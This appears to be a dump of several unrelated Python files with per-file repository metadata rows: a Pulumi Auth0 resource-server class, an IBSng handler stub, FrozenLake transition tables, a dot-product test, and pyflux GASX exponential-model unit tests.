__props__.__dict__["identifier"] = identifier
__props__.__dict__["name"] = name
__props__.__dict__["options"] = options
__props__.__dict__["scopes"] = scopes
__props__.__dict__["signing_alg"] = signing_alg
__props__.__dict__["signing_secret"] = signing_secret
__props__.__dict__["skip_consent_for_verifiable_first_party_clients"] = skip_consent_for_verifiable_first_party_clients
__props__.__dict__["token_dialect"] = token_dialect
__props__.__dict__["token_lifetime"] = token_lifetime
__props__.__dict__["token_lifetime_for_web"] = token_lifetime_for_web
__props__.__dict__["verification_location"] = verification_location
return ResourceServer(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="allowOfflineAccess")
def allow_offline_access(self) -> pulumi.Output[Optional[bool]]:
"""
Boolean. Indicates whether or not refresh tokens can be issued for this resource server.
"""
return pulumi.get(self, "allow_offline_access")
@property
@pulumi.getter(name="enforcePolicies")
def enforce_policies(self) -> pulumi.Output[Optional[bool]]:
"""
Boolean. Indicates whether or not authorization polices are enforced.
"""
return pulumi.get(self, "enforce_policies")
@property
@pulumi.getter
def identifier(self) -> pulumi.Output[Optional[str]]:
"""
String. Unique identifier for the resource server. Used as the audience parameter for authorization calls. Can not be changed once set.
"""
return pulumi.get(self, "identifier")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
String. Friendly name for the resource server. Cannot include `<` or `>` characters.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def options(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Map(String). Used to store additional metadata
"""
return pulumi.get(self, "options")
@property
@pulumi.getter
def scopes(self) -> pulumi.Output[Optional[Sequence['outputs.ResourceServerScope']]]:
"""
Set(Resource). List of permissions (scopes) used by this resource server. For details, see Scopes.
"""
return pulumi.get(self, "scopes")
@property
@pulumi.getter(name="signingAlg")
def signing_alg(self) -> pulumi.Output[str]:
"""
String. Algorithm used to sign JWTs. Options include `HS256` and `RS256`.
"""
return pulumi.get(self, "signing_alg")
@property
@pulumi.getter(name="signingSecret")
def signing_secret(self) -> pulumi.Output[str]:
"""
String. Secret used to sign tokens when using symmetric algorithms (HS256).
"""
return pulumi.get(self, "signing_secret")
@property
@pulumi.getter(name="skipConsentForVerifiableFirstPartyClients")
def skip_consent_for_verifiable_first_party_clients(self) -> pulumi.Output[Optional[bool]]:
"""
Boolean. Indicates whether or not to skip user consent for applications flagged as first party.
"""
return pulumi.get(self, "skip_consent_for_verifiable_first_party_clients")
@property
@pulumi.getter(name="tokenDialect")
def token_dialect(self) -> pulumi.Output[Optional[str]]:
"""
String. Dialect of access tokens that should be issued for this resource server. Options include `access_token` or `access_token_authz` (includes permissions).
"""
return pulumi.get(self, "token_dialect")
@property
@pulumi.getter(name="tokenLifetime")
def token_lifetime(self) -> pulumi.Output[int]:
"""
Integer. Number of seconds during which access tokens issued for this resource server from the token endpoint remain valid.
"""
return pulumi.get(self, "token_lifetime")
@property
@pulumi.getter(name="tokenLifetimeForWeb")
def token_lifetime_for_web(self) -> pulumi.Output[int]:
"""
Integer. Number of seconds during which access tokens issued for this resource server via implicit or hybrid flows remain valid. Cannot be greater than the `token_lifetime` value.
"""
return pulumi.get(self, "token_lifetime_for_web")
@property
@pulumi.getter(name="verificationLocation")
def verification_location(self) -> pulumi.Output[Optional[str]]:
"""
String
"""
return pulumi.get(self, "verification_location")
| 50.871391 | 236 | 0.677613 | 4,511 | 38,764 | 5.592552 | 0.05276 | 0.086769 | 0.088116 | 0.047091 | 0.930474 | 0.924608 | 0.916878 | 0.913747 | 0.909822 | 0.896187 | 0 | 0.002964 | 0.225286 | 38,764 | 761 | 237 | 50.938239 | 0.837102 | 0.35128 | 0 | 0.873853 | 1 | 0 | 0.120393 | 0.05183 | 0 | 0 | 0 | 0 | 0 | 1 | 0.165138 | false | 0.002294 | 0.016055 | 0 | 0.279817 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8df779d84910c0e33f1fd9d071ce3e335062b1fb | 191 | py | Python | ibsng/handler/isp/get_all_i_s_p_mapped_user_i_ds.py | ParspooyeshFanavar/pyibsng | d48bcf4f25e3f23461528bf0ff8870cc3d537444 | [
"MIT"
] | 6 | 2018-03-06T10:16:36.000Z | 2021-12-05T12:43:10.000Z | ibsng/handler/isp/get_all_i_s_p_mapped_user_i_ds.py | ParspooyeshFanavar/pyibsng | d48bcf4f25e3f23461528bf0ff8870cc3d537444 | [
"MIT"
] | 3 | 2018-03-06T10:27:08.000Z | 2022-01-02T15:21:27.000Z | ibsng/handler/isp/get_all_i_s_p_mapped_user_i_ds.py | ParspooyeshFanavar/pyibsng | d48bcf4f25e3f23461528bf0ff8870cc3d537444 | [
"MIT"
] | 3 | 2018-01-06T16:28:31.000Z | 2018-09-17T19:47:19.000Z | """Get all ISP mapped user IDs API method."""
from ibsng.handler.handler import Handler
class getAllISPMappedUserIDs(Handler):
    """Handler for the "get all ISP mapped user IDs" API method."""
| 21.222222 | 51 | 0.722513 | 26 | 191 | 5.307692 | 0.576923 | 0.086957 | 0.130435 | 0.217391 | 0.318841 | 0.318841 | 0 | 0 | 0 | 0 | 0 | 0 | 0.17801 | 191 | 8 | 52 | 23.875 | 0.878981 | 0.424084 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
5c394d043b4ca56543e290e21880e10534a4ae33 | 38 | py | Python | doc/collection/APS_32ID/non-interlaced/kwarg.py | pengdada/timbir | c9bda62d2c45cc3860a2834dd82fdc5d529ce183 | [
"BSD-3-Clause"
] | 10 | 2015-04-08T01:53:01.000Z | 2021-01-12T17:06:06.000Z | doc/collection/APS_32ID/non-interlaced/kwarg.py | pengdada/timbir | c9bda62d2c45cc3860a2834dd82fdc5d529ce183 | [
"BSD-3-Clause"
] | 13 | 2015-03-26T01:20:34.000Z | 2017-02-24T15:38:09.000Z | doc/collection/APS_32ID/non-interlaced/kwarg.py | pengdada/timbir | c9bda62d2c45cc3860a2834dd82fdc5d529ce183 | [
"BSD-3-Clause"
def kwarg(**collected):
    """Gather arbitrary keyword arguments and return them as a dict.

    Demonstrates Python's ``**kwargs`` collection: every keyword argument
    is packed into a plain dict keyed by argument name.
    """
    return collected
a502fe7b523cbe9102576980f2dc4600cc9e69d8 | 8,704 | py | Python | RL/frozen_lake/transitions.py | Shuai-Xie/pytorch-examples | 1c946fc5c6d5490b86a0bac3f3896f090b2b3593 | [
"MIT"
] | null | null | null | RL/frozen_lake/transitions.py | Shuai-Xie/pytorch-examples | 1c946fc5c6d5490b86a0bac3f3896f090b2b3593 | [
"MIT"
] | null | null | null | RL/frozen_lake/transitions.py | Shuai-Xie/pytorch-examples | 1c946fc5c6d5490b86a0bac3f3896f090b2b3593 | [
"MIT"
] | null | null | null | # 0: left
# 1: down
# 2: right
# 3: up
# Deterministic world: every transition has prob=1 — after choosing an action,
# the agent reaches the corresponding state 100% of the time.
transi_Deterministic = {
    0: {
        # (prob of transitioning into the next_state,
        # next_state, reward, is_end)
        0: [(1.0, 0, 0.0, False)],  # left: blocked by the wall, stays at state 0
        1: [(1.0, 4, 0.0, False)],  # down: moves to state 4
        2: [(1.0, 1, 0.0, False)],  # right: moves to state 1
        3: [(1.0, 0, 0.0, False)],  # up: blocked by the wall, stays at state 0
    },
    1: {0: [(1.0, 0, 0.0, False)], 1: [(1.0, 5, 0.0, True)], 2: [(1.0, 2, 0.0, False)], 3: [(1.0, 1, 0.0, False)]},
    2: {0: [(1.0, 1, 0.0, False)], 1: [(1.0, 6, 0.0, False)], 2: [(1.0, 3, 0.0, False)], 3: [(1.0, 2, 0.0, False)]},
    3: {0: [(1.0, 2, 0.0, False)], 1: [(1.0, 7, 0.0, True)], 2: [(1.0, 3, 0.0, False)], 3: [(1.0, 3, 0.0, False)]},
    4: {0: [(1.0, 4, 0.0, False)], 1: [(1.0, 8, 0.0, False)], 2: [(1.0, 5, 0.0, True)], 3: [(1.0, 0, 0.0, False)]},
    5: {0: [(1.0, 5, 0, True)], 1: [(1.0, 5, 0, True)], 2: [(1.0, 5, 0, True)], 3: [(1.0, 5, 0, True)]},  # terminal state (hole): every action stays here
    6: {0: [(1.0, 5, 0.0, True)], 1: [(1.0, 10, 0.0, False)], 2: [(1.0, 7, 0.0, True)], 3: [(1.0, 2, 0.0, False)]},
    7: {0: [(1.0, 7, 0, True)], 1: [(1.0, 7, 0, True)], 2: [(1.0, 7, 0, True)], 3: [(1.0, 7, 0, True)]},
    8: {0: [(1.0, 8, 0.0, False)], 1: [(1.0, 12, 0.0, True)], 2: [(1.0, 9, 0.0, False)], 3: [(1.0, 4, 0.0, False)]},
    9: {0: [(1.0, 8, 0.0, False)], 1: [(1.0, 13, 0.0, False)], 2: [(1.0, 10, 0.0, False)], 3: [(1.0, 5, 0.0, True)]},
    10: {0: [(1.0, 9, 0.0, False)], 1: [(1.0, 14, 0.0, False)], 2: [(1.0, 11, 0.0, True)], 3: [(1.0, 6, 0.0, False)]},
    11: {0: [(1.0, 11, 0, True)], 1: [(1.0, 11, 0, True)], 2: [(1.0, 11, 0, True)], 3: [(1.0, 11, 0, True)]},
    12: {0: [(1.0, 12, 0, True)], 1: [(1.0, 12, 0, True)], 2: [(1.0, 12, 0, True)], 3: [(1.0, 12, 0, True)]},
    13: {0: [(1.0, 12, 0.0, True)], 1: [(1.0, 13, 0.0, False)], 2: [(1.0, 14, 0.0, False)], 3: [(1.0, 9, 0.0, False)]},
    14: {0: [(1.0, 13, 0.0, False)], 1: [(1.0, 14, 0.0, False)], 2: [(1.0, 15, 1.0, True)], 3: [(1.0, 10, 0.0, False)]},  # right from 14 reaches the goal (state 15, reward 1.0)
    15: {0: [(1.0, 15, 0, True)], 1: [(1.0, 15, 0, True)], 2: [(1.0, 15, 0, True)], 3: [(1.0, 15, 0, True)]}
}
# Slippery world: after picking an action there is a 1/3 chance of reaching the
# intended state, plus 1/3 each of slipping to the left or right — note the
# slip directions are relative to the direction of movement.
# Each action maps to three (prob, next_state, reward, is_end) outcomes.
transi_Slippery = {
    0: {
        # prob = 1/3,
        0: [(0.3333333333333333, 0, 0.0, False), (0.3333333333333333, 0, 0.0, False), (0.3333333333333333, 4, 0.0, False)],
        1: [
            (0.3333333333333333, 0, 0.0, False),  # 1/3 slip left
            (0.3333333333333333, 4, 0.0, False),  # 1/3 intended move: down
            (0.3333333333333333, 1, 0.0, False),  # 1/3 slip right
        ],
        2: [
            (0.3333333333333333, 4, 0.0, False),  # 1/3 slip down
            (0.3333333333333333, 1, 0.0, False),  # 1/3 intended move: right
            (0.3333333333333333, 0, 0.0, False),  # 1/3 slip up
        ],
        3: [(0.3333333333333333, 1, 0.0, False), (0.3333333333333333, 0, 0.0, False), (0.3333333333333333, 0, 0.0, False)]
    },
    1: {
        0: [(0.3333333333333333, 1, 0.0, False), (0.3333333333333333, 0, 0.0, False), (0.3333333333333333, 5, 0.0, True)],
        1: [(0.3333333333333333, 0, 0.0, False), (0.3333333333333333, 5, 0.0, True), (0.3333333333333333, 2, 0.0, False)],
        2: [(0.3333333333333333, 5, 0.0, True), (0.3333333333333333, 2, 0.0, False), (0.3333333333333333, 1, 0.0, False)],
        3: [(0.3333333333333333, 2, 0.0, False), (0.3333333333333333, 1, 0.0, False), (0.3333333333333333, 0, 0.0, False)]}
    ,
    2: {
        0: [(0.3333333333333333, 2, 0.0, False), (0.3333333333333333, 1, 0.0, False), (0.3333333333333333, 6, 0.0, False)],
        1: [(0.3333333333333333, 1, 0.0, False), (0.3333333333333333, 6, 0.0, False), (0.3333333333333333, 3, 0.0, False)],
        2: [(0.3333333333333333, 6, 0.0, False), (0.3333333333333333, 3, 0.0, False), (0.3333333333333333, 2, 0.0, False)],
        3: [(0.3333333333333333, 3, 0.0, False), (0.3333333333333333, 2, 0.0, False), (0.3333333333333333, 1, 0.0, False)]
    },
    3: {0: [(0.3333333333333333, 3, 0.0, False), (0.3333333333333333, 2, 0.0, False), (0.3333333333333333, 7, 0.0, True)],
        1: [(0.3333333333333333, 2, 0.0, False), (0.3333333333333333, 7, 0.0, True), (0.3333333333333333, 3, 0.0, False)],
        2: [(0.3333333333333333, 7, 0.0, True), (0.3333333333333333, 3, 0.0, False), (0.3333333333333333, 3, 0.0, False)],
        3: [(0.3333333333333333, 3, 0.0, False), (0.3333333333333333, 3, 0.0, False), (0.3333333333333333, 2, 0.0, False)]},
    4: {0: [(0.3333333333333333, 0, 0.0, False), (0.3333333333333333, 4, 0.0, False), (0.3333333333333333, 8, 0.0, False)],
        1: [(0.3333333333333333, 4, 0.0, False), (0.3333333333333333, 8, 0.0, False), (0.3333333333333333, 5, 0.0, True)],
        2: [(0.3333333333333333, 8, 0.0, False), (0.3333333333333333, 5, 0.0, True), (0.3333333333333333, 0, 0.0, False)],
        3: [(0.3333333333333333, 5, 0.0, True), (0.3333333333333333, 0, 0.0, False), (0.3333333333333333, 4, 0.0, False)]},
    5: {0: [(1.0, 5, 0, True)], 1: [(1.0, 5, 0, True)], 2: [(1.0, 5, 0, True)], 3: [(1.0, 5, 0, True)]},  # terminal state (hole): every action stays here
    6: {0: [(0.3333333333333333, 2, 0.0, False), (0.3333333333333333, 5, 0.0, True), (0.3333333333333333, 10, 0.0, False)],
        1: [(0.3333333333333333, 5, 0.0, True), (0.3333333333333333, 10, 0.0, False), (0.3333333333333333, 7, 0.0, True)],
        2: [(0.3333333333333333, 10, 0.0, False), (0.3333333333333333, 7, 0.0, True), (0.3333333333333333, 2, 0.0, False)],
        3: [(0.3333333333333333, 7, 0.0, True), (0.3333333333333333, 2, 0.0, False), (0.3333333333333333, 5, 0.0, True)]},
    7: {0: [(1.0, 7, 0, True)], 1: [(1.0, 7, 0, True)], 2: [(1.0, 7, 0, True)], 3: [(1.0, 7, 0, True)]},
    8: {0: [(0.3333333333333333, 4, 0.0, False), (0.3333333333333333, 8, 0.0, False), (0.3333333333333333, 12, 0.0, True)],
        1: [(0.3333333333333333, 8, 0.0, False), (0.3333333333333333, 12, 0.0, True), (0.3333333333333333, 9, 0.0, False)],
        2: [(0.3333333333333333, 12, 0.0, True), (0.3333333333333333, 9, 0.0, False), (0.3333333333333333, 4, 0.0, False)],
        3: [(0.3333333333333333, 9, 0.0, False), (0.3333333333333333, 4, 0.0, False), (0.3333333333333333, 8, 0.0, False)]},
    9: {
        0: [
            (0.3333333333333333, 5, 0.0, True),  # slip up
            (0.3333333333333333, 8, 0.0, False),  # intended move: left
            (0.3333333333333333, 13, 0.0, False),  # slip down
        ],
        1: [(0.3333333333333333, 8, 0.0, False), (0.3333333333333333, 13, 0.0, False), (0.3333333333333333, 10, 0.0, False)],
        2: [(0.3333333333333333, 13, 0.0, False), (0.3333333333333333, 10, 0.0, False), (0.3333333333333333, 5, 0.0, True)],
        3: [(0.3333333333333333, 10, 0.0, False), (0.3333333333333333, 5, 0.0, True), (0.3333333333333333, 8, 0.0, False)]},
    10: {0: [(0.3333333333333333, 6, 0.0, False), (0.3333333333333333, 9, 0.0, False), (0.3333333333333333, 14, 0.0, False)],
         1: [(0.3333333333333333, 9, 0.0, False), (0.3333333333333333, 14, 0.0, False), (0.3333333333333333, 11, 0.0, True)],
         2: [(0.3333333333333333, 14, 0.0, False), (0.3333333333333333, 11, 0.0, True), (0.3333333333333333, 6, 0.0, False)],
         3: [(0.3333333333333333, 11, 0.0, True), (0.3333333333333333, 6, 0.0, False), (0.3333333333333333, 9, 0.0, False)]},
    11: {0: [(1.0, 11, 0, True)], 1: [(1.0, 11, 0, True)], 2: [(1.0, 11, 0, True)], 3: [(1.0, 11, 0, True)]},
    12: {0: [(1.0, 12, 0, True)], 1: [(1.0, 12, 0, True)], 2: [(1.0, 12, 0, True)], 3: [(1.0, 12, 0, True)]},
    13: {0: [(0.3333333333333333, 9, 0.0, False), (0.3333333333333333, 12, 0.0, True), (0.3333333333333333, 13, 0.0, False)],
         1: [(0.3333333333333333, 12, 0.0, True), (0.3333333333333333, 13, 0.0, False), (0.3333333333333333, 14, 0.0, False)],
         2: [(0.3333333333333333, 13, 0.0, False), (0.3333333333333333, 14, 0.0, False), (0.3333333333333333, 9, 0.0, False)],
         3: [(0.3333333333333333, 14, 0.0, False), (0.3333333333333333, 9, 0.0, False), (0.3333333333333333, 12, 0.0, True)]},
    14: {0: [(0.3333333333333333, 10, 0.0, False), (0.3333333333333333, 13, 0.0, False), (0.3333333333333333, 14, 0.0, False)],
         1: [(0.3333333333333333, 13, 0.0, False), (0.3333333333333333, 14, 0.0, False), (0.3333333333333333, 15, 1.0, True)],
         2: [(0.3333333333333333, 14, 0.0, False), (0.3333333333333333, 15, 1.0, True), (0.3333333333333333, 10, 0.0, False)],
         3: [(0.3333333333333333, 15, 1.0, True), (0.3333333333333333, 10, 0.0, False), (0.3333333333333333, 13, 0.0, False)]},
    15: {0: [(1.0, 15, 0, True)], 1: [(1.0, 15, 0, True)], 2: [(1.0, 15, 0, True)], 3: [(1.0, 15, 0, True)]}}
| 83.692308 | 128 | 0.52562 | 1,505 | 8,704 | 3.036545 | 0.041196 | 0.08884 | 0.208315 | 0.110284 | 0.936324 | 0.931947 | 0.855361 | 0.839825 | 0.804376 | 0.798687 | 0 | 0.484279 | 0.218061 | 8,704 | 103 | 129 | 84.504854 | 0.187188 | 0.042854 | 0 | 0.206522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
a51800e96c0a6a4a77756bd398169c70e52cb3a7 | 138 | py | Python | greedy-algorithms/dot_product_tests.py | hristo-vrigazov/Algorithms | 441420ee03a8a94fc11b304e1a8cd0a65a2a1df5 | [
"MIT"
] | null | null | null | greedy-algorithms/dot_product_tests.py | hristo-vrigazov/Algorithms | 441420ee03a8a94fc11b304e1a8cd0a65a2a1df5 | [
"MIT"
] | null | null | null | greedy-algorithms/dot_product_tests.py | hristo-vrigazov/Algorithms | 441420ee03a8a94fc11b304e1a8cd0a65a2a1df5 | [
"MIT"
] | null | null | null | from dot_product import min_dot_product
assert(min_dot_product([1, 3, -5], [-2, 4, 1]) == -25)
assert(min_dot_product([23], [39]) == 897) | 34.5 | 54 | 0.673913 | 25 | 138 | 3.44 | 0.6 | 0.465116 | 0.453488 | 0.44186 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.122951 | 0.115942 | 138 | 4 | 55 | 34.5 | 0.581967 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.666667 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 8 |
ebacf8f6a3f2b8f83c6702f157544d4da9e194b5 | 18,538 | py | Python | pyflux/gas/tests/gasx_tests_exponential.py | ThomasHoppe/pyflux | 297f2afc2095acd97c12e827dd500e8ea5da0c0f | [
"BSD-3-Clause"
] | 2,091 | 2016-04-01T02:52:10.000Z | 2022-03-29T11:38:15.000Z | pyflux/gas/tests/gasx_tests_exponential.py | EricSchles/pyflux | 297f2afc2095acd97c12e827dd500e8ea5da0c0f | [
"BSD-3-Clause"
] | 160 | 2016-04-26T14:52:18.000Z | 2022-03-15T02:09:07.000Z | pyflux/gas/tests/gasx_tests_exponential.py | EricSchles/pyflux | 297f2afc2095acd97c12e827dd500e8ea5da0c0f | [
"BSD-3-Clause"
] | 264 | 2016-05-02T14:03:31.000Z | 2022-03-29T07:48:20.000Z | import numpy as np
import pandas as pd
import pyflux as pf
# Set up some data to use for the tests
countdata = np.random.exponential(3,500)  # in-sample response: 500 exponential draws, scale 3
x1 = np.random.normal(0,1,500)  # two standard-normal predictors
x2 = np.random.normal(0,1,500)
data = pd.DataFrame([countdata,x1,x2]).T
data.columns = ['y', 'x1', 'x2']
# Out-of-sample frame: 30 fresh rows used by predict(h=..., oos_data=data_oos)
x1_oos = np.random.normal(0,1,30)
x2_oos = np.random.normal(0,1,30)
countdata_oos = np.random.exponential(3,30)
data_oos = pd.DataFrame([countdata_oos,x1_oos,x2_oos]).T
data_oos.columns = ['y', 'x1', 'x2']
def test_exponential_no_terms():
    """GASX/Exponential with no AR or SC terms: 2 latent variables, none NaN."""
    model = pf.GASX(formula="y ~ x1", data=data, ar=0, sc=0, family=pf.Exponential())
    model.fit()
    z_vals = np.array([lv.value for lv in model.latent_variables.z_list])
    assert(len(model.latent_variables.z_list) == 2)
    assert(not np.any(np.isnan(z_vals)))

def test_exponential_couple_terms():
    """GASX/Exponential with 1 AR and 1 SC term: 4 latent variables, none NaN."""
    model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
    model.fit()
    z_vals = np.array([lv.value for lv in model.latent_variables.z_list])
    assert(len(model.latent_variables.z_list) == 4)
    assert(not np.any(np.isnan(z_vals)))

def test_exponential_bbvi():
    """Estimation via BBVI: 4 latent variables, none NaN."""
    model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
    model.fit('BBVI', iterations=100)
    z_vals = np.array([lv.value for lv in model.latent_variables.z_list])
    assert(len(model.latent_variables.z_list) == 4)
    assert(not np.any(np.isnan(z_vals)))

def test_exponential_mh():
    """Estimation via Metropolis-Hastings: 4 latent variables, none NaN."""
    model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
    model.fit('M-H', nsims=300)
    z_vals = np.array([lv.value for lv in model.latent_variables.z_list])
    assert(len(model.latent_variables.z_list) == 4)
    assert(not np.any(np.isnan(z_vals)))

def test_exponential_laplace():
    """Estimation via Laplace approximation: 4 latent variables, none NaN."""
    model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
    model.fit('Laplace')
    z_vals = np.array([lv.value for lv in model.latent_variables.z_list])
    assert(len(model.latent_variables.z_list) == 4)
    assert(not np.any(np.isnan(z_vals)))

def test_exponential_pml():
    """Estimation via PML: 4 latent variables, none NaN."""
    model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
    model.fit('PML')
    z_vals = np.array([lv.value for lv in model.latent_variables.z_list])
    assert(len(model.latent_variables.z_list) == 4)
    assert(not np.any(np.isnan(z_vals)))
def test_exponential_predict_length():
    """predict() returns a frame with exactly h rows."""
    model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
    results = model.fit()
    results.summary()
    forecast = model.predict(h=5, oos_data=data_oos)
    assert(forecast.shape[0] == 5)

def test_exponential_predict_is_length():
    """predict_is() returns a frame with exactly h rows."""
    model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
    model.fit()
    in_sample = model.predict_is(h=5)
    assert(len(in_sample.index) == 5)

def test_exponential_predict_nans():
    """Out-of-sample predictions contain no NaNs."""
    model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
    results = model.fit()
    results.summary()
    forecast = model.predict(h=5, oos_data=data_oos)
    assert(not np.any(np.isnan(forecast.values)))

def test_exponential_predict_is_nans():
    """In-sample rolling predictions contain no NaNs."""
    model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
    results = model.fit()
    results.summary()
    in_sample = model.predict_is(h=5)
    assert(not np.any(np.isnan(in_sample.values)))
def test_predict_nonconstant():
    """
    Predictions over the horizon should not all be identical — a constant
    forecast usually means the predict routine failed to iterate forward.

    Bug fixed: the original body never fitted the model nor assigned
    `predictions`, so the assert raised NameError instead of testing anything.
    """
    model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
    model.fit()  # must fit before forecasting
    predictions = model.predict(h=10, oos_data=data_oos)
    assert(not np.all(predictions.values==predictions.values[0]))
def test_predict_is_nonconstant():
    """
    In-sample rolling predictions should not all be identical — a constant
    forecast usually means the predict function failed to iterate forward.

    Bug fixed: the original body never fitted the model nor assigned
    `predictions`, so the assert raised NameError instead of testing anything.
    """
    model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
    model.fit()  # must fit before forecasting
    predictions = model.predict_is(h=10)
    assert(not np.all(predictions.values==predictions.values[0]))
def test_predict_intervals():
    """Out-of-sample prediction interval bounds are strictly ordered (MLE fit)."""
    model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
    model.fit()
    preds = model.predict(h=10, oos_data=data_oos, intervals=True)
    bounds = ['99% Prediction Interval', '95% Prediction Interval',
              '5% Prediction Interval', '1% Prediction Interval']
    for upper, lower in zip(bounds, bounds[1:]):
        assert(np.all(preds[upper].values > preds[lower].values))

def test_predict_is_intervals():
    """In-sample prediction interval bounds are strictly ordered (MLE fit)."""
    model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
    model.fit()
    preds = model.predict_is(h=10, intervals=True)
    bounds = ['99% Prediction Interval', '95% Prediction Interval',
              '5% Prediction Interval', '1% Prediction Interval']
    for upper, lower in zip(bounds, bounds[1:]):
        assert(np.all(preds[upper].values > preds[lower].values))

def test_predict_intervals_bbvi():
    """Out-of-sample prediction interval bounds are strictly ordered (BBVI fit)."""
    model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
    model.fit('BBVI', iterations=100)
    preds = model.predict(h=10, oos_data=data_oos, intervals=True)
    bounds = ['99% Prediction Interval', '95% Prediction Interval',
              '5% Prediction Interval', '1% Prediction Interval']
    for upper, lower in zip(bounds, bounds[1:]):
        assert(np.all(preds[upper].values > preds[lower].values))

def test_predict_is_intervals_bbvi():
    """In-sample prediction interval bounds are strictly ordered (BBVI fit)."""
    model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
    model.fit('BBVI', iterations=100)
    preds = model.predict_is(h=10, intervals=True)
    bounds = ['99% Prediction Interval', '95% Prediction Interval',
              '5% Prediction Interval', '1% Prediction Interval']
    for upper, lower in zip(bounds, bounds[1:]):
        assert(np.all(preds[upper].values > preds[lower].values))

def test_predict_intervals_mh():
    """Out-of-sample prediction interval bounds are strictly ordered (M-H fit)."""
    model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
    model.fit('M-H', nsims=400)
    preds = model.predict(h=10, oos_data=data_oos, intervals=True)
    bounds = ['99% Prediction Interval', '95% Prediction Interval',
              '5% Prediction Interval', '1% Prediction Interval']
    for upper, lower in zip(bounds, bounds[1:]):
        assert(np.all(preds[upper].values > preds[lower].values))

def test_predict_is_intervals_mh():
    """In-sample prediction interval bounds are strictly ordered (M-H fit)."""
    model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
    model.fit('M-H', nsims=400)
    preds = model.predict_is(h=10, intervals=True)
    bounds = ['99% Prediction Interval', '95% Prediction Interval',
              '5% Prediction Interval', '1% Prediction Interval']
    for upper, lower in zip(bounds, bounds[1:]):
        assert(np.all(preds[upper].values > preds[lower].values))
def test_sample_model():
    """sample() returns an array of shape (nsims, len(data)-1)."""
    model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
    model.fit('BBVI', iterations=100)
    draws = model.sample(nsims=100)
    assert(draws.shape == (100, len(data)-1))

def test_ppc():
    """The posterior predictive p-value lies in [0, 1]."""
    model = pf.GASX(formula="y ~ x1", data=data, ar=1, sc=1, family=pf.Exponential())
    model.fit('BBVI', iterations=100)
    assert(0.0 <= model.ppc() <= 1.0)
## Try more than one predictor
def test2_exponential_no_terms():
    """Two predictors, no AR/SC terms: 3 latent variables, none NaN."""
    model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=0, sc=0, family=pf.Exponential())
    model.fit()
    z_vals = np.array([lv.value for lv in model.latent_variables.z_list])
    assert(len(model.latent_variables.z_list) == 3)
    assert(not np.any(np.isnan(z_vals)))

def test2_exponential_couple_terms():
    """Two predictors, 1 AR and 1 SC term: 5 latent variables, none NaN."""
    model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
    model.fit()
    z_vals = np.array([lv.value for lv in model.latent_variables.z_list])
    assert(len(model.latent_variables.z_list) == 5)
    assert(not np.any(np.isnan(z_vals)))

def test2_exponential_bbvi():
    """Two predictors, BBVI estimation: 5 latent variables, none NaN."""
    model = pf.GASX(formula="y ~ x1 + x2", data=data, ar=1, sc=1, family=pf.Exponential())
    model.fit('BBVI', iterations=100)
    z_vals = np.array([lv.value for lv in model.latent_variables.z_list])
    assert(len(model.latent_variables.z_list) == 5)
    assert(not np.any(np.isnan(z_vals)))

